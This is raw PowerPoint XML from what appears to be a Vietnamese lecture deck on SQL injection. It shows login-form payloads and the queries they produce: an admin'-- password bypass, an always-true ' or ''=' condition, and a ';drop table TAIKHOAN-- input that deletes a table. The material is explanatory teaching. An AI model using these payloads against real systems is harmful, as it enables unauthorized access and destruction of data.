                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>	</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>               </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Password</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>: “Nhập vào đây ký tự bất kỳ”</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="285750" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>C</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>âu lệnh truy vấn sẽ là:</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>     </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Select*from </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>TAIKHOAN where TenDangNhap='admin'-- 'and MatKhau=''</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="285750" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="à"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Ta </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>có thể đăng nhập thành công với quyền admin mà không cần password. </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="285750" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="à"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Kết </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>quả truy vấn sẽ trả về tất cả các bản ghi của bảng TAIKHOAN và dòng đầu tiên trong bảng TAIKHOAN sẽ được chọn.</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1050" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="TextBox 63"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1665861" y="1176385"/>
              <a:ext cx="819219" cy="577255"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>TH2</a:t>
              </a:r>
              <a:endParaRPr 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69" name="Group 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="515610" y="4316617"/>
            <a:ext cx="8126808" cy="4554995"/>
            <a:chOff x="467545" y="961563"/>
            <a:chExt cx="8676456" cy="6363580"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="16200000" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="70" name="Group 69"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="467545" y="961563"/>
              <a:ext cx="8676456" cy="6363580"/>
              <a:chOff x="467545" y="953670"/>
              <a:chExt cx="8676456" cy="6363580"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="72" name="Group 71"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="467545" y="953670"/>
                <a:ext cx="8676456" cy="6363580"/>
                <a:chOff x="467545" y="4310844"/>
                <a:chExt cx="8676456" cy="6363580"/>
              </a:xfrm>
              <a:grpFill/>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="74" name="Rectangle 73"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="467545" y="4797152"/>
                  <a:ext cx="8676456" cy="5877272"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:grpFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="508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sp>
              <p:nvSpPr>
                <p:cNvPr id="75" name="Oval 74"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2621024" y="4310844"/>
                  <a:ext cx="1062372" cy="10623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grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="TextBox 72"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="881982" y="1484856"/>
                <a:ext cx="7767367" cy="3902076"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1800" b="1"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vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Giá trị nhập vào: Username: ' or ''='</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>     </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>	               </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Password: ' or ''='</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="285750" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Câu lệnh SQL sẽ như sau:</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>      </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Select*from </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>TAIKHOAN where TenDangNhap='' or ''='' and MatKhau='' or ''=''</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  </a:rPr>
                  <a:t></a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Chúng ta có thể đăng nhập thành công vì điều kiện trong mệnh đề WHERE là luôn luôn đúng, kết quả truy vấn sẽ trả về tất cả các bản ghi của bảng TAIKHOAN và dòng đầu tiên trong bảng TAIKHOAN sẽ được chọn.</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1050" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="TextBox 70"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2742599" y="1159244"/>
              <a:ext cx="819219" cy="577255"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>TH3</a:t>
              </a:r>
              <a:endParaRPr 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76" name="Group 75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="515610" y="4664712"/>
            <a:ext cx="8126808" cy="4522872"/>
            <a:chOff x="467545" y="1006441"/>
            <a:chExt cx="8676456" cy="6318702"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="16200000" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="77" name="Group 76"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="467545" y="1006441"/>
              <a:ext cx="8676456" cy="6318702"/>
              <a:chOff x="467545" y="998548"/>
              <a:chExt cx="8676456" cy="6318702"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="79" name="Group 78"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="467545" y="998548"/>
                <a:ext cx="8676456" cy="6318702"/>
                <a:chOff x="467545" y="4355722"/>
                <a:chExt cx="8676456" cy="6318702"/>
              </a:xfrm>
              <a:grpFill/>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Rectangle 80"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="467545" y="4797152"/>
                  <a:ext cx="8676456" cy="5877272"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:grpFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="50800" dir="5400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sp>
              <p:nvSpPr>
                <p:cNvPr id="82" name="Oval 81"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3697763" y="4355722"/>
                  <a:ext cx="1062372" cy="10623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sz="1050"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="80" name="TextBox 79"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="876452" y="1739944"/>
                <a:ext cx="7767367" cy="4418053"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Kết </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>hợp với kí tự đặc biệt của SQL: </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Kí </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>tự “ ; ”: đánh dấu kết thúc 1 câu truy vấn</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="285750" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Giá trị nhập vào: Username: ‘;drop table TAIKHOAN--</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>	               </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Password</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>:</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="285750" indent="-285750" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Câu lệnh SQL lúc này như sau:</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>      </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Select*from </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>TAIKHOAN WHERE TenDangNhap= ''; drop table TAIKHOAN -- ' and </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>MatKhau</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" b="1" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>= ''</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr lvl="0" algn="just">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                    <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Chúng </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="vi-VN" dirty="0">
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>ta có thể xóa một bảng trong cơ sở dữ liệu nếu biết tên của bảng mà không cần phải đăng nhập vì sau ký tự “;” hệ thống sẽ hiểu đó là đánh dấu để kết thúc 1 câu truy vấn và chương trình sẽ thực hiện câu truy vấn sau đó.</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1050" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="TextBox 77"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3819338" y="1181683"/>
              <a:ext cx="819219" cy="577255"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>TH4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="21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1856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8.33333E-7 0.11544 L 8.33333E-7 -0.62407 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-36975"/>
                                    </p:animMotion>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8.33333E-7 0.11544 L 8.33333E-7 -0.62407 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-36975"/>
                                    </p:animMotion>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8.33333E-7 0.11543 L 8.33333E-7 -0.62407 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-36975"/>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8.33333E-7 0.11543 L 8.33333E-7 -0.62408 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="76"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x,ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-369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665309" y="525135"/>
            <a:ext cx="7612067" cy="524457"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>trường</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hợp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>khác</a:t>
            </a:r>
